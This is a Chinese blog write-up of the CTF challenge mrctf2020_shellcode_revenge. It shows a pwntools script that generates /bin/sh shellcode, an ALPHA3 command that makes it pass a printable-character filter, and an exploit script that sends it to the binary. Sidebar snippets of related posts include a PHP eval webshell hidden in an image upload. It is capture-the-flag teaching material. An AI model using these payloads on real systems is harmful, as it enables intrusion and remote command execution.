mrctf2020_shellcode_revenge

最新推荐文章于 2024-03-18 11:14:48 发布
最新推荐文章于 2024-03-18 11:14:48 发布
阅读量752 收藏 1
点赞数
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K1ose/article/details/116077226
版权

下载附件,checksec一下;
在这里插入图片描述

存在可读可写可执行的段;
看一下IDA pro的汇编;
在这里插入图片描述
和先前的题目类似,先read也给0x400bytes的字符串,然后compare一下eax和0;
jg表示jump if greater,如果eax>0则跳转,否则eax为0,跳到另一个地址;
接下来看到很多判断语句,截取其中一部分进行分析;
在这里插入图片描述
这里比较al和`的大小,jle表示jump if less or equal,即小于等于;
如果al<=60h,则跳转到11DA,如果al<=7Ah,则跳转到1236;
同理分析其他的判断语句,最后得到结果:
输入0x30-0x5f以及0x61-0x7f才能不被过滤;
需要利用这些字符去构造shellcode;
这里就要用到一个工具ALPHA3,git clone https://github.com/TaQini/alpha3.git

先写一个shellcode.py脚本,用于生成普通的shellcode;

from pwn import *
context.arch="amd64"
f = open('sc.bin','wb')
f.write(asm(shellcraft.sh()))
f.close()

执行后,用alpha3.py生成可见字符shellcode;

python ./ALPHA3.py x64 ascii mixedcase rax --input="sc.bin"

执行成功将会返回可见字符shellcode,再写个exploit.py,把shellcode打进去就好了;

from pwn import *

p = process("./mrctf2020_shellcode_revenge")
payload = "your_shellcode“
p.sendafter('magic!',payload)
p.interactive()

在这里插入图片描述
连buu,打过去,拿flag;
在这里插入图片描述

K1ose
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode
mcmuyanga的博客
03-15 3648
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
mrctf2020_shellcode详解
勿山几已
06-09 561
简单演示mrctf2020_shellcode解题步骤
BUUCTF-MRCTF2020
Atkx's Blog
08-08 5490
目录标题Ezpop套娃 Ezpop 套娃 查看源码 $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t']))
BUUCTF之[MRCTF2020]你传你呢-------文件解析漏洞
weixin_44632787的博客
06-19 9060
BUUCTF之[MRCTF2020]你传你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上传漏洞,结果没做出来。 不管怎么样,先上传一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
CDL_shellcode_源码
10-02
在IT领域,Shellcode是一种特殊的低级代码,通常用汇编语言编写,用于利用软件漏洞执行任意命令。Shellcode在安全研究和逆向工程中扮演着重要角色,它可以直接在目标进程中运行,绕过安全机制,执行攻击者指定的操作...
pe_to_shellcode:将PE转换为Shellcode
05-09
pe_to_shellcode 转换PE,以便可以像普通shellcode一样将其注入。 (同时,输出文件仍然是有效的PE)。 同时支持32位和64位PE 作者: 和 客观的 该项目的目标是提供一种生成PE文件的可能性,该文件可以轻松完成...
pe_to_shellcode_linux:PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode(https:github.comhasherezadepe_to_shellcode
02-13
pe_to_shellcode_linux PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode( )。 Hashrezade的HLDR64文件源 下载和构建: 在终端中,通过git...
Android系统shellcode编写.zip_android_shellcode
09-23
在Android系统中,shellcode是一种特殊的代码片段,用于在获得程序执行权限后,实现特定功能,比如控制系统、执行恶意操作等。随着Android设备的广泛使用,Android系统的安全性变得至关重要,而shellcode的编写和...
rs_shellcode:另一个shellcode运行器
05-23
rs-shellcode 在Rust中编写的shellcode运行器使用 。 如何使用它 安装 ,使用每晚toochain。 rustup default nightly 使用msfvenom生成shellcode进行测试。 msfvenom -p windows/x64/exec CMD=calc.exe --...
【菜鸡练习】MRCTF2020你传你码呢
最新发布
kawayiUU的博客
03-18 388
可以看到直接上传.htaccess文件是不行的,原因是存在mime过滤,默认设置只允许jpg、gif、bmp类型文件通过过滤。所以我们修改Content-Type类型为image/jpeg ,再上传.htaccess文件。访问刚刚上传成功的file.jpg,页面全白,意思是我们上传的file.jpg已经当成php解析。注意在kali下默认会将 .开头的文件隐藏,修改查看方式即可看见新建的.htaccess文件。看页面是一个文件上传漏洞的题目,文件上传的基本思路有很多,本题通关点在。在根目录下找到flag。
mrctf2020_shellcode
K1ose的博客
04-21 585
拿到附件后,先file一下; 看到是个64bit的程序,拖到ida64里; 再checksec一下附件,看看保护情况; 栈没有保护,有可读可写可执行的段; 可以dbg调试一下,看看具体情况; 可以看到有一个段可读可写可执行,栈也确实没有什么保护; 现在去IDA分析一下程序; 变量参数如下 可以看到前几行在设置标准输入输出和错误; 接着输出"Show me your magic!"; 然后read一个400bytes的数据; 接着是关键代码,将$eax赋值给[rbp+var_4],接着与0进行比较
mrctf2020_shellcode_revenge|wustctf2020_name_your_cat|2018_gettingStart|SUCTF_2018_stack|wustctf2020
weixin_46521144的博客
04-05 381
这五道题都异常简单。。。也不知道为啥 wustctf2020_number_game 这题大概是csapp第二章学好了直接连就可以了。 v1=Tmin=-2147483648即可。因为32位有符号整数下Tmin是1000_0000_0000_0000,取反码加上1还是Tmin 2018_gettingStart 好吧,这道题还是CSAPP第二章知识直接运用。有一个简单的溢出覆盖,其实是考察浮点的位表示,写个c程序跑一下就出来了 #include<stdio.h> int .
buu [MRCTF2020]vigenere
shshss64的博客
09-25 1533
维吉尼亚密码
BUUCTF-PWN刷题记录-9
weixin_44145820的博客
04-17 1476
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
MRCTF2020 web Ezpop_Revenge 简单记录
a3320315的博客
03-31 3000
题目介绍 首先这是一个typecho的框架 然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~ 解题过程 首先我们找到输入点 在插件中,我们发现action()的代码 这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~ Helper::addRoute("page_admin_action","/page_a...
【BUUCTF之[MRCTF2020]你传你呢 1】
qq_40646572的博客
10-25 5298
首先,正常上传图片文件,竟然因为文件大小的问题,上传失败,就挺难受。不过还好,总算知道是什么原因不能上传。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
[MRCTF2020]Ezpop
FUCKING12的博客
01-01 199
先创建2个show对象a,b,在最后反序列化的时候$a=new Show()会调用__wakeup()函数,此时a->source是b,b此时是一个Show()对象,就会调用b里面__toString()方法,此时b里面的str是Test()对象,Test()对象没有source变量,便会调用Test()里面的__get()方法,将Test()类里面的p创建为Modifier(),然后就会调用Modifier()里面的__invoke()方法,执行append()函数,实现文件执行的功能。
others_shellcode
07-28
others_shellcode是一种外部的、已编写好的机器码程序,在计算机系统中用于执行恶意行为,例如攻击、病毒、木马等。它可以被黑客选用,注入到受害者主机的内存中,并被执行。由于others_shellcode本身就是已经准备好的机器码程序,所以它可以绕过各种安全措施,不易被检测到,对系统造成更大的威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值